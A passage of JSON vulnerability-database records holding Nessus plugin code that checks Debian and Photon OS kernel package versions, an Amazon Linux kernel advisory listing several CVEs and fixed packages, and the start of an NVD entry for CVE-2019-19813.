reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nbd-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nfs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-shared-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-usb-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-wireless-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-wireless-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-wireless-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-wireless-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-wireless-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"nic-wireless-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"pata-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"pata-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"pata-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"pata-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"pata-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"ppp-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"rtc-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sata-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-core-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-nic-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-nic-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-nic-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-nic-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-nic-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"scsi-nic-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"serial-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sound-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sound-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sound-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"sound-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"speakup-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"squashfs-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"udf-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"uinput-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"uinput-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"uinput-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-serial-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usb-storage-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"usbip\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"xfs-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"xfs-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"xfs-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"xfs-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"xfs-modules-4.19.0-5-powerpc64le-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"xfs-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-4kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-5kc-malta-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-armmp-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-loongson-3-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-marvell-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-octeon-di\", reference:\"4.19.171-2\")) flag++;\nif (deb_check(release:\"10.0\", prefix:\"zlib-modules-4.19.0-5-s390x-di\", reference:\"4.19.171-2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T01:08:31", "description": "An update of the linux package has been released.", "edition": 2, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-12-22T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2020-1.0-0350", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-29661", "CVE-2020-29660"], "modified": "2020-12-22T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2020-1_0-0350_LINUX.NASL", "href": "https://www.tenable.com/plugins/nessus/144519", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-1.0-0350. The text\n# itself is copyright (C) VMware, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144519);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/23\");\n\n script_cve_id(\"CVE-2020-29660\", \"CVE-2020-29661\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2020-1.0-0350\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the linux package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-1.0-350.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-29661\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item('Host/PhotonOS/release');\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, 'PhotonOS');\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, 'PhotonOS 1.0');\n\nif (!get_kb_item('Host/PhotonOS/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'PhotonOS', cpu);\n\nflag = 0;\n\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', reference:'linux-api-headers-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-dev-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-docs-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-drivers-gpu-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-esx-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-esx-devel-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-esx-docs-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-oprofile-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-sound-4.4.248-1.ph1')) flag++;\nif (rpm_check(release:'PhotonOS-1.0', cpu:'x86_64', reference:'linux-tools-4.4.248-1.ph1')) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'linux');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2021-07-25T19:22:26", "bulletinFamily": "unix", "cvelist": ["CVE-2019-19813", "CVE-2019-19816", "CVE-2020-27815", "CVE-2020-29568", "CVE-2020-29569", "CVE-2020-29660", "CVE-2020-29661"], "description": "**Issue Overview:**\n\nIn the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c. (CVE-2019-19813)\n\nA flaw was found in the implementation of the BTRFS file system code in the Linux kernel. An attacker, who is able to mount a crafted BTRFS filesystem and perform common filesystem operations, can possibly cause an out-of-bounds write to memory. This could lead to memory corruption or privilege escalation. (CVE-2019-19816)\n\nArray index out of bounds access when setting extended attributes on journaling filesystems. (CVE-2020-27815)\n\nAn issue was discovered in Xen through 4.14.x. Some OSes (such as Linux, FreeBSD, and NetBSD) are processing watch events using a single thread. If the events are received faster than the thread is able to handle, they will get queued. As the queue is unbounded, a guest may be able to trigger an OOM in the backend. All systems with a FreeBSD, Linux, or NetBSD (any version) dom0 are vulnerable. (CVE-2020-29568)\n\nAn issue was discovered in the Linux kernel through 5.10.1, as used with Xen through 4.14.x. The Linux kernel PV block backend expects the kernel thread handler to reset ring->xenblkd to NULL when stopped. However, the handler may not have time to run if the frontend quickly toggles between the states connect and disconnect. As a consequence, the block backend may re-use a pointer after it was freed. A misbehaving guest can trigger a dom0 crash by continuously connecting / disconnecting a block frontend. Privilege escalation and information leaks cannot be ruled out. This only affects systems with a Linux blkback. (CVE-2020-29569)\n\nA locking inconsistency issue was discovered in the tty subsystem of the Linux kernel through 5.9.13. drivers/tty/tty_io.c and drivers/tty/tty_jobctrl.c may allow a read-after-free attack against TIOCGSID, aka CID-c8bcd9c5be24. (CVE-2020-29660)\n\nA locking vulnerability was found in the tty subsystem of the Linux kernel in drivers/tty/tty_jobctrl.c. This flaw allows a local attacker to possibly corrupt memory or escalate privileges. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2020-29661)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 kernel-headers-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-debuginfo-common-i686-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-debuginfo-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-tools-debuginfo-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-devel-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 perf-debuginfo-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 perf-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-tools-devel-4.14.214-118.339.amzn1.i686 \n \u00a0\u00a0\u00a0 kernel-tools-4.14.214-118.339.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 kernel-4.14.214-118.339.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 kernel-tools-devel-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-headers-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-tools-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 perf-debuginfo-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-devel-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-tools-debuginfo-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-debuginfo-common-x86_64-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-debuginfo-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 perf-4.14.214-118.339.amzn1.x86_64 \n \u00a0\u00a0\u00a0 kernel-4.14.214-118.339.amzn1.x86_64 \n \n \n", "modified": "2021-01-26T19:03:00", "published": "2021-01-26T00:11:00", "id": "ALAS-2021-1477", "href": "https://alas.aws.amazon.com/ALAS-2021-1477.html", "type": "amazon", "title": "Important: kernel", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-04-23T00:45:23", "description": "In the Linux kernel 5.0.21, mounting a crafted btrfs filesystem image, performing some operations, and then making a syncfs system call can lead to a use-after-free in __mutex_lock in kernel/locking/mutex.c. This is related to mutex_can_spin_on_owner in kernel/locking/mutex.c, __btrfs_qgroup_free_meta in fs/btrfs/qgroup.c, and btrfs_insert_delayed_items in fs/btrfs/delayed-inode.c.", "edition": 13, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-12-17T06:15:00", "title": "CVE-2019-19813", "type": "cve", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.9, 